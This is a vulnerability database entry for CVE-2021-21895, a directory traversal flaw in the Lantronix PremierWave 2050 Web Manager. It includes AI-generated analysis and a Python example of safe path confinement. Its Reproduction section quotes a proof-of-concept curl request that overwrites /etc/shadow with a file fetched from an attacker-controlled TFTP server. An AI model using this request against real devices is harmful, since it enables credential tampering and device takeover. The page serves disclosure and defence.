CVE-2021-21895
Description
A directory traversal vulnerability exists in the Web Manager FsTFtp functionality of Lantronix PremierWave 2050 8.9.0.0R4 (in QEMU). A specially crafted HTTP request can lead to FsTFtp file overwrite. An attacker can make an authenticated HTTP request to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
CVE-2021-21895 is a directory traversal flaw in Lantronix PremierWave 2050 Web Manager FsTFtp that allows authenticated attackers to overwrite arbitrary files via HTTP requests.
Vulnerability
A directory traversal vulnerability exists in the Web Manager FsTFtp functionality of Lantronix PremierWave 2050 firmware version 8.9.0.0R4 (tested in QEMU). The feature allows an authenticated user with filesystem privilege to direct a TFTP client on the device to GET or PUT files into or out of a subdirectory rooted at /ltrx_user/. The system sanitizes some but not all attacker-controlled HTTP POST parameters; specifically, the cwd parameter is not properly sanitized before composition of the final file path, enabling path traversal sequences to escape the intended directory [1].
Exploitation
An attacker must be authenticated with a valid user account that has filesystem privilege. The attacker sends a specially crafted HTTP POST request to the Web Manager, manipulating the cwd parameter with path traversal primitives (e.g., ../). This lets the attacker direct the device's TFTP client to fetch a file from an attacker-controlled TFTP server and write it to an arbitrary path outside the /ltrx_user/ directory, or to send arbitrary files from the device to that server. The attack requires network access to the device's web interface and a remote TFTP server reachable from the device [1].
Impact
Successful exploitation leads to arbitrary file overwrite (CIA impact: integrity and availability) and arbitrary file disclosure (confidentiality impact). The attacker can overwrite critical system files such as /etc/passwd or /etc/shadow, potentially gaining full control of the device or causing denial of service. The CVSSv3 score is 9.1 (Critical), with a scope change indicating compromise of resources beyond the vulnerable component [1].
Mitigation
As of the publication date (2021-12-22), no fix has been released by Lantronix. The vulnerability is reported on tested firmware version 8.9.0.0R4. Users should monitor vendor advisories for patches. No workaround is disclosed in the available references. The vulnerability is not listed on the CISA KEV catalog as of the publication date [1].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1. Range: =8.9.0.0R4
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Insufficient sanitization of the attacker-controlled `cwd` HTTP POST parameter allows path traversal sequences to bypass the intended directory restriction rooted at `/ltrx_user/`."
Attack vector
An authenticated attacker with filesystem privilege sends a crafted HTTP POST request to the Web Manager's FsTFtp functionality. The `cwd` parameter is not fully sanitized, so a value such as `../etc` causes the device's TFTP client to compose a file path outside the intended `/ltrx_user/` directory [ref_id=1]. By setting `cmd=get`, the attacker can overwrite arbitrary files (e.g., `/etc/shadow`) with content from an attacker-controlled TFTP server [CWE-22] [ref_id=1]. The attack is network-accessible and requires only valid credentials with the filesystem privilege [ref_id=1].
Affected code
The advisory does not specify exact function names or file paths [ref_id=1]. The vulnerable feature is the FsTFtp functionality within the Web Manager, which handles the `cwd`, `local`, `remote`, `host`, and `port` HTTP POST parameters to direct a TFTP client on the device [ref_id=1].
What the fix does
The advisory does not include a patch diff or remediation code [ref_id=1]. The vendor was disclosed on 2021-06-14 and acknowledged the issue, but no fix is published in the advisory [ref_id=1]. To close the vulnerability, the `cwd` parameter must be validated to reject path traversal sequences (e.g., `../`) and ensure all file operations remain confined to the `/ltrx_user/` directory [CWE-22] [ref_id=1].
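As an added illustration of the confinement check described above (example code written for this page, not Lantronix firmware or anything from the advisory), the following Python shows a naive path composition that reproduces the described flaw beside a hardened version that rejects any `cwd`/`local` combination resolving outside `/ltrx_user/`. The function names, the `PathEscapeError` type and the use of `posixpath` are assumptions for illustration; the device's real handler is not public.

```python
import posixpath

# Hypothetical root for the FsTFtp feature, taken from the advisory's description.
ROOT = "/ltrx_user"


class PathEscapeError(ValueError):
    """Raised when a requested path would leave the permitted root (hypothetical name)."""


def compose_path_unsafe(cwd: str, local: str) -> str:
    """Naive composition mirroring the flaw the advisory describes:
    cwd is joined in without checking that the result stays under ROOT."""
    return posixpath.normpath(posixpath.join(ROOT, cwd, local))


def compose_path_safe(cwd: str, local: str) -> str:
    """Hardened composition: reject absolute components and NUL bytes,
    resolve '.' and '..' lexically, then require the normalised result
    to be a strict child of ROOT."""
    for part in (cwd, local):
        if part.startswith("/") or "\x00" in part:
            raise PathEscapeError(f"absolute path or NUL byte rejected: {part!r}")
    if not local:
        raise PathEscapeError("a file name is required")
    candidate = posixpath.normpath(posixpath.join(ROOT, cwd, local))
    # The prefix check includes the trailing separator so that a sibling such as
    # /ltrx_user_evil is not mistaken for a child of /ltrx_user, and so that
    # ROOT itself (a directory, not a file) is never returned.
    if not candidate.startswith(ROOT + "/"):
        raise PathEscapeError(f"path escapes {ROOT}: {candidate}")
    return candidate


def is_confined(cwd: str, local: str) -> bool:
    """True if the hardened check accepts the pair, False if it rejects it."""
    try:
        compose_path_safe(cwd, local)
        return True
    except PathEscapeError:
        return False


if __name__ == "__main__":
    # Constructed inputs: the advisory's traversal value beside benign ones.
    for cwd, local in [("../etc", "shadow"), ("sub", "config.txt"), ("", "../../etc/shadow")]:
        print(f"cwd={cwd!r} local={local!r}")
        print("  unsafe ->", compose_path_unsafe(cwd, local))
        print("  safe   ->", "accepted" if is_confined(cwd, local) else "rejected")
```

The check is purely lexical, which is what makes it testable offline; on a real device the resolved path should additionally be passed through `os.path.realpath` (or the platform equivalent) after the lexical check, so that a symbolic link placed inside `/ltrx_user/` cannot redirect a confined path elsewhere.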
Preconditions
- auth: Attacker must have valid credentials with the filesystem privilege on the PremierWave 2050 Web Manager.
- network: Attacker must have network access to the Web Manager interface and must control a TFTP server reachable from the device.
- input: Attacker must supply a `cwd` parameter containing path traversal sequences (e.g., `../etc`) in the HTTP POST request.
Reproduction
The advisory provides a proof-of-concept curl command [ref_id=1]:
```
curl --user admin:PASS -d "ajax=FsTFtp&cmd=get&local=shadow&remote=shadow&host=192.168.0.254&port=69&submit=Transfer&cwd=../etc" http://192.168.0.1/
```
This overwrites `/etc/shadow` on the device with a file served from an attacker-controlled TFTP server at 192.168.0.254 [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1. talosintelligence.com/vulnerability_reports/TALOS-2021-1337 (MISC)
News mentions
No linked articles in our index yet.